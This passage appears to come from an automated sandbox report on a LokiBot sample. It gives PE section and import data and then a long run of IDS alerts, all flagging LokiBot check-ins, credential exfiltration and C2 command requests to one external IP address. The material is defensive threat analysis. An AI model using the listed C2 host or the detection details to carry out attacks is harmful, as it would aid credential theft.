                                IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                .text0x10000x140000x1380094fa411af1cc6bb168a3ea0e66e80f78False0.5685096153846154data6.49204829439013IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                .rdata0x150000x50000x42006ada3db9ddb6e4994558f8fd80a5cd3fFalse0.3701467803030303data4.2685971103623865IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .data0x1a0000x860000x200955b3a57edf41d6c47c7225e8d847f91False0.056640625OpenPGP Public Key0.32171607431271465IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .x0xa00000x10000x200b9e3e5990c2d44bf83df2063f8e8e2cbFalse0.21875data1.957748567000045IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                DLLImport
                                WS2_32.dllgetaddrinfo, freeaddrinfo, closesocket, WSAStartup, socket, send, recv, connect
                                KERNEL32.dllGetProcessHeap, HeapFree, HeapAlloc, SetLastError, GetLastError
                                ole32.dllCoCreateInstance, CoInitialize, CoUninitialize
                                OLEAUT32.dllVariantInit, SysFreeString, SysAllocString
                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                2025-01-11T01:42:20.817288+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.84970494.156.177.4180TCP
                                2025-01-11T01:42:20.817288+01002025381ET MALWARE LokiBot Checkin1192.168.2.84970494.156.177.4180TCP
                                2025-01-11T01:42:20.817288+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.84970494.156.177.4180TCP
                                2025-01-11T01:42:21.548499+01002024312ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M11192.168.2.84970494.156.177.4180TCP
                                2025-01-11T01:42:22.238848+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.84970594.156.177.4180TCP
                                2025-01-11T01:42:22.238848+01002025381ET MALWARE LokiBot Checkin1192.168.2.84970594.156.177.4180TCP
                                2025-01-11T01:42:22.238848+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.84970594.156.177.4180TCP
                                2025-01-11T01:42:22.950193+01002024312ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M11192.168.2.84970594.156.177.4180TCP
                                2025-01-11T01:42:23.040247+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.84970694.156.177.4180TCP
                                2025-01-11T01:42:23.040247+01002025381ET MALWARE LokiBot Checkin1192.168.2.84970694.156.177.4180TCP
                                2025-01-11T01:42:23.040247+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.84970694.156.177.4180TCP
                                2025-01-11T01:42:23.762234+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.84970694.156.177.4180TCP
                                2025-01-11T01:42:23.762234+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.84970694.156.177.4180TCP
                                2025-01-11T01:42:23.920673+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.84970794.156.177.4180TCP
                                2025-01-11T01:42:23.920673+01002025381ET MALWARE LokiBot Checkin1192.168.2.84970794.156.177.4180TCP
                                2025-01-11T01:42:23.920673+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.84970794.156.177.4180TCP
                                2025-01-11T01:42:24.642872+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.84970794.156.177.4180TCP
                                2025-01-11T01:42:24.642872+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.84970794.156.177.4180TCP
                                2025-01-11T01:42:25.197136+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.84970894.156.177.4180TCP
                                2025-01-11T01:42:25.197136+01002025381ET MALWARE LokiBot Checkin1192.168.2.84970894.156.177.4180TCP
                                2025-01-11T01:42:25.197136+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.84970894.156.177.4180TCP
                                2025-01-11T01:42:25.938002+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.84970894.156.177.4180TCP
                                2025-01-11T01:42:25.938002+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.84970894.156.177.4180TCP
                                2025-01-11T01:42:26.102355+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.84970994.156.177.4180TCP
                                2025-01-11T01:42:26.102355+01002025381ET MALWARE LokiBot Checkin1192.168.2.84970994.156.177.4180TCP
                                2025-01-11T01:42:26.102355+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.84970994.156.177.4180TCP
                                2025-01-11T01:42:26.818252+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.84970994.156.177.4180TCP
                                2025-01-11T01:42:26.818252+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.84970994.156.177.4180TCP
                                2025-01-11T01:42:26.968789+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.84971094.156.177.4180TCP
                                2025-01-11T01:42:26.968789+01002025381ET MALWARE LokiBot Checkin1192.168.2.84971094.156.177.4180TCP
                                2025-01-11T01:42:26.968789+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.84971094.156.177.4180TCP
                                2025-01-11T01:42:27.703027+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.84971094.156.177.4180TCP
                                2025-01-11T01:42:27.703027+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.84971094.156.177.4180TCP
                                2025-01-11T01:42:28.135810+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.84971194.156.177.4180TCP
                                2025-01-11T01:42:28.135810+01002025381ET MALWARE LokiBot Checkin1192.168.2.84971194.156.177.4180TCP
                                2025-01-11T01:42:28.135810+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.84971194.156.177.4180TCP
                                2025-01-11T01:42:28.855418+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.84971194.156.177.4180TCP
                                2025-01-11T01:42:28.855418+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.84971194.156.177.4180TCP
                                2025-01-11T01:42:29.019551+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.84971294.156.177.4180TCP
                                2025-01-11T01:42:29.019551+01002025381ET MALWARE LokiBot Checkin1192.168.2.84971294.156.177.4180TCP
                                2025-01-11T01:42:29.019551+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.84971294.156.177.4180TCP
                                2025-01-11T01:42:29.739177+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.84971294.156.177.4180TCP
                                2025-01-11T01:42:29.739177+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.84971294.156.177.4180TCP
                                2025-01-11T01:42:29.891718+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.84971394.156.177.4180TCP
                                2025-01-11T01:42:29.891718+01002025381ET MALWARE LokiBot Checkin1192.168.2.84971394.156.177.4180TCP
                                2025-01-11T01:42:29.891718+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.84971394.156.177.4180TCP
                                2025-01-11T01:42:30.609312+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.84971394.156.177.4180TCP
                                2025-01-11T01:42:30.609312+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.84971394.156.177.4180TCP
                                2025-01-11T01:42:31.084444+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.84971494.156.177.4180TCP
                                2025-01-11T01:42:31.084444+01002025381ET MALWARE LokiBot Checkin1192.168.2.84971494.156.177.4180TCP
                                2025-01-11T01:42:31.084444+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.84971494.156.177.4180TCP
                                2025-01-11T01:42:31.824610+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.84971494.156.177.4180TCP
                                2025-01-11T01:42:31.824610+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.84971494.156.177.4180TCP
                                2025-01-11T01:42:31.992422+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.84971594.156.177.4180TCP
                                2025-01-11T01:42:31.992422+01002025381ET MALWARE LokiBot Checkin1192.168.2.84971594.156.177.4180TCP
                                2025-01-11T01:42:31.992422+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.84971594.156.177.4180TCP
                                2025-01-11T01:42:32.733349+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.84971594.156.177.4180TCP
                                2025-01-11T01:42:32.733349+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.84971594.156.177.4180TCP
                                2025-01-11T01:42:32.889368+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.84971694.156.177.4180TCP
                                2025-01-11T01:42:32.889368+01002025381ET MALWARE LokiBot Checkin1192.168.2.84971694.156.177.4180TCP
                                2025-01-11T01:42:32.889368+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.84971694.156.177.4180TCP
                                2025-01-11T01:42:33.590744+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.84971694.156.177.4180TCP
                                2025-01-11T01:42:33.590744+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.84971694.156.177.4180TCP
                                2025-01-11T01:42:34.065163+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.84971794.156.177.4180TCP
                                2025-01-11T01:42:34.065163+01002025381ET MALWARE LokiBot Checkin1192.168.2.84971794.156.177.4180TCP
                                2025-01-11T01:42:34.065163+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.84971794.156.177.4180TCP
                                2025-01-11T01:42:34.808586+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.84971794.156.177.4180TCP
                                2025-01-11T01:42:34.808586+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.84971794.156.177.4180TCP
                                2025-01-11T01:42:34.969892+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.84971894.156.177.4180TCP
                                2025-01-11T01:42:34.969892+01002025381ET MALWARE LokiBot Checkin1192.168.2.84971894.156.177.4180TCP
                                2025-01-11T01:42:34.969892+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.84971894.156.177.4180TCP
                                2025-01-11T01:42:35.673992+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.84971894.156.177.4180TCP
                                2025-01-11T01:42:35.673992+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.84971894.156.177.4180TCP
                                2025-01-11T01:42:35.848202+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.84972094.156.177.4180TCP
                                2025-01-11T01:42:35.848202+01002025381ET MALWARE LokiBot Checkin1192.168.2.84972094.156.177.4180TCP
                                2025-01-11T01:42:35.848202+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.84972094.156.177.4180TCP
                                2025-01-11T01:42:36.597333+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.84972094.156.177.4180TCP
                                2025-01-11T01:42:36.597333+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.84972094.156.177.4180TCP
                                2025-01-11T01:42:36.756536+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.84972294.156.177.4180TCP
                                2025-01-11T01:42:36.756536+01002025381ET MALWARE LokiBot Checkin1192.168.2.84972294.156.177.4180TCP
                                2025-01-11T01:42:36.756536+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.84972294.156.177.4180TCP
                                2025-01-11T01:42:37.453451+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.84972294.156.177.4180TCP
                                2025-01-11T01:42:37.453451+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.84972294.156.177.4180TCP
                                2025-01-11T01:42:37.616845+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.84972394.156.177.4180TCP
                                2025-01-11T01:42:37.616845+01002025381ET MALWARE LokiBot Checkin1192.168.2.84972394.156.177.4180TCP
                                2025-01-11T01:42:37.616845+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.84972394.156.177.4180TCP
                                2025-01-11T01:42:38.373443+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.84972394.156.177.4180TCP
                                2025-01-11T01:42:38.373443+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.84972394.156.177.4180TCP
                                2025-01-11T01:42:38.534914+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.84972494.156.177.4180TCP
                                2025-01-11T01:42:38.534914+01002025381ET MALWARE LokiBot Checkin1192.168.2.84972494.156.177.4180TCP
                                2025-01-11T01:42:38.534914+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.84972494.156.177.4180TCP
                                2025-01-11T01:42:39.300522+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.84972494.156.177.4180TCP
                                2025-01-11T01:42:39.300522+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.84972494.156.177.4180TCP
                                2025-01-11T01:42:39.453290+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.84972594.156.177.4180TCP
                                2025-01-11T01:42:39.453290+01002025381ET MALWARE LokiBot Checkin1192.168.2.84972594.156.177.4180TCP
                                2025-01-11T01:42:39.453290+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.84972594.156.177.4180TCP
                                2025-01-11T01:42:40.182347+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.84972594.156.177.4180TCP
                                2025-01-11T01:42:40.182347+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.84972594.156.177.4180TCP
                                2025-01-11T01:42:40.352448+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.84972694.156.177.4180TCP
                                2025-01-11T01:42:40.352448+01002025381ET MALWARE LokiBot Checkin1192.168.2.84972694.156.177.4180TCP
                                2025-01-11T01:42:40.352448+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.84972694.156.177.4180TCP
                                2025-01-11T01:42:41.051405+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.84972694.156.177.4180TCP
                                2025-01-11T01:42:41.051405+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.84972694.156.177.4180TCP
                                2025-01-11T01:42:41.207139+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.84972794.156.177.4180TCP
                                2025-01-11T01:42:41.207139+01002025381ET MALWARE LokiBot Checkin1192.168.2.84972794.156.177.4180TCP
                                2025-01-11T01:42:41.207139+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.84972794.156.177.4180TCP
                                2025-01-11T01:42:41.904144+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.84972794.156.177.4180TCP
                                2025-01-11T01:42:41.904144+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.84972794.156.177.4180TCP
                                2025-01-11T01:42:42.069381+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.84972894.156.177.4180TCP
                                2025-01-11T01:42:42.069381+01002025381ET MALWARE LokiBot Checkin1192.168.2.84972894.156.177.4180TCP
                                2025-01-11T01:42:42.069381+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.84972894.156.177.4180TCP
                                2025-01-11T01:42:42.789215+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.84972894.156.177.4180TCP
                                2025-01-11T01:42:42.789215+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.84972894.156.177.4180TCP
                                2025-01-11T01:42:42.979513+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.84972994.156.177.4180TCP
                                2025-01-11T01:42:42.979513+01002025381ET MALWARE LokiBot Checkin1192.168.2.84972994.156.177.4180TCP
                                2025-01-11T01:42:42.979513+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.84972994.156.177.4180TCP
                                2025-01-11T01:42:43.880204+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.84972994.156.177.4180TCP
                                2025-01-11T01:42:43.880204+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.84972994.156.177.4180TCP
                                2025-01-11T01:42:44.030365+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.84973094.156.177.4180TCP
                                2025-01-11T01:42:44.030365+01002025381ET MALWARE LokiBot Checkin1192.168.2.84973094.156.177.4180TCP
                                2025-01-11T01:42:44.030365+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.84973094.156.177.4180TCP
                                2025-01-11T01:42:44.715443+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.84973094.156.177.4180TCP
                                2025-01-11T01:42:44.715443+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.84973094.156.177.4180TCP
                                2025-01-11T01:42:44.878656+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.84973194.156.177.4180TCP
                                2025-01-11T01:42:44.878656+01002025381ET MALWARE LokiBot Checkin1192.168.2.84973194.156.177.4180TCP
                                2025-01-11T01:42:44.878656+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.84973194.156.177.4180TCP
                                2025-01-11T01:42:45.597583+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.84973194.156.177.4180TCP
                                2025-01-11T01:42:45.597583+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.84973194.156.177.4180TCP
                                2025-01-11T01:42:45.910982+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.84973294.156.177.4180TCP
                                2025-01-11T01:42:45.910982+01002025381ET MALWARE LokiBot Checkin1192.168.2.84973294.156.177.4180TCP
                                2025-01-11T01:42:45.910982+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.84973294.156.177.4180TCP
                                2025-01-11T01:42:46.616967+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.84973294.156.177.4180TCP
                                2025-01-11T01:42:46.616967+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.84973294.156.177.4180TCP
                                2025-01-11T01:42:46.766963+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.84973394.156.177.4180TCP
                                2025-01-11T01:42:46.766963+01002025381ET MALWARE LokiBot Checkin1192.168.2.84973394.156.177.4180TCP
                                2025-01-11T01:42:46.766963+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.84973394.156.177.4180TCP
                                2025-01-11T01:42:47.494263+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.84973394.156.177.4180TCP
                                2025-01-11T01:42:47.494263+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.84973394.156.177.4180TCP
                                2025-01-11T01:42:47.676875+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.84973494.156.177.4180TCP
                                2025-01-11T01:42:47.676875+01002025381ET MALWARE LokiBot Checkin1192.168.2.84973494.156.177.4180TCP
                                2025-01-11T01:42:47.676875+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.84973494.156.177.4180TCP
                                2025-01-11T01:42:48.388017+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.84973494.156.177.4180TCP
                                2025-01-11T01:42:48.388017+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.84973494.156.177.4180TCP
                                2025-01-11T01:42:48.545843+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.84973594.156.177.4180TCP
                                2025-01-11T01:42:48.545843+01002025381ET MALWARE LokiBot Checkin1192.168.2.84973594.156.177.4180TCP
                                2025-01-11T01:42:48.545843+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.84973594.156.177.4180TCP
                                2025-01-11T01:42:49.285558+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.84973594.156.177.4180TCP
                                2025-01-11T01:42:49.285558+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.84973594.156.177.4180TCP
                                2025-01-11T01:42:49.438319+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.84973694.156.177.4180TCP
                                2025-01-11T01:42:49.438319+01002025381ET MALWARE LokiBot Checkin1192.168.2.84973694.156.177.4180TCP
                                2025-01-11T01:42:49.438319+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.84973694.156.177.4180TCP
                                2025-01-11T01:42:50.165740+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.84973694.156.177.4180TCP
                                2025-01-11T01:42:50.165740+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.84973694.156.177.4180TCP
                                2025-01-11T01:42:50.341121+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.84973794.156.177.4180TCP
                                2025-01-11T01:42:50.341121+01002025381ET MALWARE LokiBot Checkin1192.168.2.84973794.156.177.4180TCP
                                2025-01-11T01:42:50.341121+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.84973794.156.177.4180TCP
                                2025-01-11T01:42:51.033454+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.84973794.156.177.4180TCP
                                2025-01-11T01:42:51.033454+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.84973794.156.177.4180TCP
                                2025-01-11T01:42:51.209451+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.84973894.156.177.4180TCP
                                2025-01-11T01:42:51.209451+01002025381ET MALWARE LokiBot Checkin1192.168.2.84973894.156.177.4180TCP
                                2025-01-11T01:42:51.209451+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.84973894.156.177.4180TCP
                                2025-01-11T01:42:51.929916+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.84973894.156.177.4180TCP
                                2025-01-11T01:42:51.929916+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.84973894.156.177.4180TCP
                                2025-01-11T01:42:52.288988+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.84973994.156.177.4180TCP
                                2025-01-11T01:42:52.288988+01002025381ET MALWARE LokiBot Checkin1192.168.2.84973994.156.177.4180TCP
                                2025-01-11T01:42:52.288988+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.84973994.156.177.4180TCP
                                2025-01-11T01:42:53.011005+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.84973994.156.177.4180TCP
                                2025-01-11T01:42:53.011005+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.84973994.156.177.4180TCP
                                2025-01-11T01:42:53.175499+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.84974094.156.177.4180TCP
                                2025-01-11T01:42:53.175499+01002025381ET MALWARE LokiBot Checkin1192.168.2.84974094.156.177.4180TCP
                                2025-01-11T01:42:53.175499+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.84974094.156.177.4180TCP
                                2025-01-11T01:42:54.019699+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.84974094.156.177.4180TCP
                                2025-01-11T01:42:54.019699+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.84974094.156.177.4180TCP
                                2025-01-11T01:42:54.184422+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.84974194.156.177.4180TCP
                                2025-01-11T01:42:54.184422+01002025381ET MALWARE LokiBot Checkin1192.168.2.84974194.156.177.4180TCP
                                2025-01-11T01:42:54.184422+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.84974194.156.177.4180TCP
                                2025-01-11T01:42:54.883072+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.84974194.156.177.4180TCP
                                2025-01-11T01:42:54.883072+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.84974194.156.177.4180TCP
                                2025-01-11T01:42:55.035617+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.84974294.156.177.4180TCP
                                2025-01-11T01:42:55.035617+01002025381ET MALWARE LokiBot Checkin1192.168.2.84974294.156.177.4180TCP
                                2025-01-11T01:42:55.035617+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.84974294.156.177.4180TCP
                                2025-01-11T01:42:55.733113+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.84974294.156.177.4180TCP
                                2025-01-11T01:42:55.733113+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.84974294.156.177.4180TCP
                                2025-01-11T01:42:55.992626+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.84974394.156.177.4180TCP
                                2025-01-11T01:42:55.992626+01002025381ET MALWARE LokiBot Checkin1192.168.2.84974394.156.177.4180TCP
                                2025-01-11T01:42:55.992626+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.84974394.156.177.4180TCP
                                2025-01-11T01:42:56.756990+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.84974394.156.177.4180TCP
                                2025-01-11T01:42:56.756990+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.84974394.156.177.4180TCP
                                2025-01-11T01:42:56.917464+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.84974494.156.177.4180TCP
                                2025-01-11T01:42:56.917464+01002025381ET MALWARE LokiBot Checkin1192.168.2.84974494.156.177.4180TCP
                                2025-01-11T01:42:56.917464+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.84974494.156.177.4180TCP
                                2025-01-11T01:42:57.657232+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.84974494.156.177.4180TCP
                                2025-01-11T01:42:57.657232+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.84974494.156.177.4180TCP
                                2025-01-11T01:42:57.813692+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.84974594.156.177.4180TCP
                                2025-01-11T01:42:57.813692+01002025381ET MALWARE LokiBot Checkin1192.168.2.84974594.156.177.4180TCP
                                2025-01-11T01:42:57.813692+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.84974594.156.177.4180TCP
                                2025-01-11T01:42:58.531476+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.84974594.156.177.4180TCP
                                2025-01-11T01:42:58.531476+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.84974594.156.177.4180TCP
                                2025-01-11T01:42:58.986101+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.84974694.156.177.4180TCP
                                2025-01-11T01:42:58.986101+01002025381ET MALWARE LokiBot Checkin1192.168.2.84974694.156.177.4180TCP
                                2025-01-11T01:42:58.986101+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.84974694.156.177.4180TCP
                                2025-01-11T01:42:59.839528+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.84974694.156.177.4180TCP
                                2025-01-11T01:42:59.839528+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.84974694.156.177.4180TCP
                                2025-01-11T01:43:00.003340+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.84974794.156.177.4180TCP
                                2025-01-11T01:43:00.003340+01002025381ET MALWARE LokiBot Checkin1192.168.2.84974794.156.177.4180TCP
                                2025-01-11T01:43:00.003340+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.84974794.156.177.4180TCP
                                2025-01-11T01:43:00.718117+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.84974794.156.177.4180TCP
                                2025-01-11T01:43:00.718117+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.84974794.156.177.4180TCP
                                2025-01-11T01:43:00.875736+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.84974894.156.177.4180TCP
                                2025-01-11T01:43:00.875736+01002025381ET MALWARE LokiBot Checkin1192.168.2.84974894.156.177.4180TCP
                                2025-01-11T01:43:00.875736+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.84974894.156.177.4180TCP
                                2025-01-11T01:43:01.574531+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.84974894.156.177.4180TCP
                                2025-01-11T01:43:01.574531+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.84974894.156.177.4180TCP
                                2025-01-11T01:43:01.944954+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.84974994.156.177.4180TCP
                                2025-01-11T01:43:01.944954+01002025381ET MALWARE LokiBot Checkin1192.168.2.84974994.156.177.4180TCP
